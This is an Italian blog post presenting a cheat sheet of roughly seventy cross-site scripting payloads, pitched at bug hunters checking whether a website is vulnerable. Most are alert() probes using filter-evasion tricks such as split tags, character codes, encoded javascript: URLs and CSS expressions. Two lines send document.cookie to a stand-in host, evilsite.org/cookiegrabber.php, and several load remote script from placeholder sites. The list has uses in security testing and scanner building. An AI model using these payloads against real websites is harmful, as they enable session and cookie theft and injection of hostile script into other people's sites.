Codici per trovare una XSS

Phishing

Codici per trovare una XSS

0

Avevamo promesso qualche giorno fa, di darvi altri esempi su come trovare delle XSS in un sito web.

Ecco quindi di seguito, una “cheat sheet” contenente dei codici utilizzati dai “Bug-Hunter” per controllare se un sito web soffre di Cross Site Scripting.

Divertitevi!

<script>alert(1);</script>

<script>alert(‘XSS’);</script>

<script src=”http://www.evilsite.org/cookiegrabber.php”></script>

<script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie=”+escape(document.cookie)</script>

<scr<script>ipt>alert(‘XSS’);</scr</script>ipt>

<script>alert(String.fromCharCode(88,83,83))</script>

<img src=foo.png onerror=alert(/xssed/) />

<style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style>

<? echo(‘<scr)’; echo(‘ipt>alert(\”XSS\”)</script>’); ?>

<marquee><script>alert(‘XSS’)</script></marquee>

<IMG SRC=\”jav&#x09;ascript:alert(‘XSS’);\”>

<IMG SRC=\”jav&#x0A;ascript:alert(‘XSS’);\”>

<IMG SRC=\”jav&#x0D;ascript:alert(‘XSS’);\”>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

“><script>alert(0)</script>

<script src=http://yoursite.com/your_files.js></script>

</title><script>alert(/xss/)</script>

</textarea><script>alert(/xss/)</script>

<IMG LOWSRC=\”javascript:alert(‘XSS’)\”>

<IMG DYNSRC=\”javascript:alert(‘XSS’)\”>

<font style=’color:expression(alert(document.cookie))’>

‘); alert(‘XSS

<img src=”javascript:alert(‘XSS’)”>

<script language=”JavaScript”>alert(‘XSS’)</script>

[url=javascript:alert(‘XSS’);]click me[/url]

<body onunload=”javascript:alert(‘XSS’);”>

<body onLoad=”alert(‘XSS’);”

[color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]

“/></a></><img src=1.gif onerror=alert(1)>

window.alert(“Bonjour !”);

<div style=”x:expression((window.r==1)?”:eval(‘r=1;

alert(String.fromCharCode(88,83,83));’))”>

<iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>

“><script alert(String.fromCharCode(88,83,83))</script>

‘>><marquee><h1>XSS</h1></marquee>

‘”>><script>alert(‘XSS’)</script>

‘”>><marquee><h1>XSS</h1></marquee>

<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>

<META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\”>

<script>var var = 1; alert(var)</script>

<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

<?='<SCRIPT>alert(“XSS”)</SCRIPT>’?>

<IMG SRC=’vbscript:msgbox(\”XSS\”)’>

” onfocus=alert(document.domain) “> <”

<FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>

<STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS

perl -e ‘print \”<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>\”;’ > out

perl -e ‘print \”<IMG SRC=java\0script:alert(\”XSS\”)>\”;’ > out

<br size=\”&{alert(‘XSS’)}\”>

<scrscriptipt>alert(1)</scrscriptipt>

</br style=a:expression(alert())>

</script><script>alert(1)</script>

“><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

[color=red width=expression(alert(123))] [color]

<BASE HREF=”javascript:alert(‘XSS’);//”>

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

“></iframe><script>alert(123)</script>

<body onLoad=”while(true) alert(‘XSS’);”>

‘”></title><script>alert(1111)</script>

</textarea>'”><script>alert(document.cookie)</script>

‘””><script language=”JavaScript”> alert(‘X \nS \nS’);</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

<html><noalert><noscript>(123)</noscript><script>(123)</script>

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

‘></select><script>alert(123)</script>

‘>”><script src = ‘http://www.site.com/XSS.js’></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

<SCRIPT>document.write(“XSS”);</SCRIPT>

a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);

=’><script>alert(“xss”)</script>

<script+src=”>”+src=”http://yoursite.com/xss.js?69,69″></script>

<body background=javascript:'”><script>alert(navigator.userAgent)</script>></body>

“>><script>alert(document.cookie)</script><script src=”http://www.site.com/XSS.js”></script>

“>><script>alert(document.cookie)</script>

src=”http://www.site.com/XSS.js”></script>

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

Volendo, si potrebbe utilizzare questo cheatsheet per creare un vulnerability scanner. Qualche idea su come realizzarlo? 🙂

About the Author

Federico PonziStudente, Webmaster ed appassionato di tutto ciò che è informatico con una spruzzata di scienza.View all posts by Federico Ponzi

Leave a Reply